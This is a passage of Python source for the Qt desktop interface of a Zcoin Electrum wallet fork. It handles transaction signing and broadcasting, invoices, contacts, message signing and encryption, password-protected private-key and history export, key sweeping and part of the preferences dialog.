if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid zcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.get_list_header())
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
if xtype in ['p2wpkh', 'p2wsh', 'p2wpkh-p2sh', 'p2wsh-p2sh']:
vbox.addWidget(WWLabel(_("Warning: the format of private keys associated to segwit addresses may not be compatible with other wallets")))
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Zcoin address.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Zcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_xzc.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_xzc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("zcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
from electrum_xzc.transaction import SerializationError
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self):
from electrum_xzc.transaction import SerializationError
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self):
from electrum_xzc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-xzc-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum-xzc_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-xzc-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum_xzc.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_xzc.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
